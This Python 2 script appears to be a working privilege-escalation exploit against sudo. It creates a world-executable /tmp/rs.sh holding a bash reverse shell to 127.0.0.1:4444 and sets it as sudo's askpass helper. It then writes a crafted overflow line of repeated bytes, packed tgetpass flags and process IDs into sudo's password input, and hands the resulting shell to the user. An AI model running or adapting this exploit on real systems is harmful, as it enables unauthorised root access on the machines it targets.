#!/usr/bin/env python2
import sys,os
from pwn import *
# Symlink-resolved absolute path of the sudo binary driven by the PoC below.
_SUDO_PATH = "/usr/bin/sudo"
TARGET = os.path.realpath(_SUDO_PATH)
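def setFlags(flags):
    """Encode a '|'-separated list of tgetpass flag names into their bitmask.

    Args:
        flags: string such as "TGP_STDIN|TGP_ASKPASS". Whitespace around each
            name is ignored and empty items are skipped, so "" encodes to 0.

    Returns:
        The integer OR of the named TGP_* values.

    Raises:
        KeyError: if a name is not one of the known TGP_* flags.
    """
    tgetpassFlags = {
        "TGP_NOECHO": 0x00,
        "TGP_ECHO": 0x01,
        "TGP_STDIN": 0x02,
        "TGP_ASKPASS": 0x04,
        "TGP_MASK": 0x08,
        "TGP_NOECHO_TRY": 0x10,
    }
    retval = 0
    for name in flags.split("|"):
        name = name.strip()
        if not name:
            # Tolerate "A||B" and leading/trailing separators.
            continue
        retval |= tgetpassFlags[name]
    return retval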
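def getFlags(intFlag):
    """Decode a tgetpass flag bitmask into '|'-joined TGP_* names.

    Inverse of setFlags(). Names are listed from the least to the most
    significant set bit, so getFlags(0x06) == "TGP_STDIN|TGP_ASKPASS".
    A zero mask decodes to "TGP_NOECHO", whose value is 0 and therefore
    never appears alongside other names.

    Args:
        intFlag: integer bitmask.

    Returns:
        The '|'-separated flag names ("" for a negative input, which has no
        bit <= itself to test).

    Raises:
        KeyError: if a set bit has no known TGP_* name.
    """
    tgetpassFlags = {
        0x00: "TGP_NOECHO",
        0x01: "TGP_ECHO",
        0x02: "TGP_STDIN",
        0x04: "TGP_ASKPASS",
        0x08: "TGP_MASK",
        0x10: "TGP_NOECHO_TRY",
    }
    if intFlag == 0:
        return tgetpassFlags[0]
    names = []
    mask = 1
    while mask <= intFlag:
        # The original wrote `intFlag & mask == mask`, which Python parses as
        # `intFlag & (mask == mask)`, i.e. `intFlag & 1`, so every position was
        # decided by bit 0 alone. Test the bit under consideration instead.
        if intFlag & mask:
            names.append(tgetpassFlags[mask])
        mask <<= 1
    return "|".join(names)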
if __name__ == "__main__":
    # PoC driver. Runs under Python 2 (see the shebang), so `payload` is a str
    # of raw bytes and pwntools' p32/p64 return str here. The specific sudo
    # defect this input exercises is not named anywhere in this file.
    # Write a world-executable helper script that redirects an interactive bash
    # over a TCP connection to 127.0.0.1:4444.
    with open("/tmp/rs.sh", "w") as file:
        file.write("""#!/bin/bash
bash -i >& /dev/tcp/127.0.0.1/4444 0>&1
""")
    os.chmod("/tmp/rs.sh", 0o777)
    # pwntools listener that receives the connection opened by /tmp/rs.sh.
    r=listen(4444)
    # Hand sudo a pseudo-terminal as stdin; input is fed through `mfd` below.
    mfd, sfd = os.openpty()
    fd = os.open(os.ttyname(sfd), os.O_RDONLY)
    # -S makes sudo read the password from stdin; SUDO_ASKPASS points its
    # askpass helper at the script written above.
    p = process([TARGET,"-S", "id"],env={'SUDO_ASKPASS':"/tmp/rs.sh"}, stdin=fd)
    # Single input line written to the pty: 548 x (NUL, 0x15), the packed
    # TGP_STDIN|TGP_ASKPASS value, 20 more pairs, five 32-bit pids, three NULs
    # and a terminating newline.
    payload = "\x00\x15"*548
    payload += p64(setFlags("TGP_STDIN|TGP_ASKPASS"))
    payload += "\x00\x15"*(20)
    pid = p.pid
    # presumably the pid of sudo's parent, i.e. this script -- confirm against
    # pwnlib.util.proc.parent
    ppid = util.proc.parent(pid)
    payload += p32(pid)
    payload += p32(ppid)
    payload += p32(pid)
    payload += p32(pid)
    payload += p32(pid)
    payload += "\x00"*3
    payload += "\n"
    # Writing to the master side delivers the line to sudo's stdin.
    os.write(mfd, payload)
    # Block until /tmp/rs.sh connects back, then hand the session to the user.
    r.wait_for_connection()
    r.interactive()
    sys.exit(0)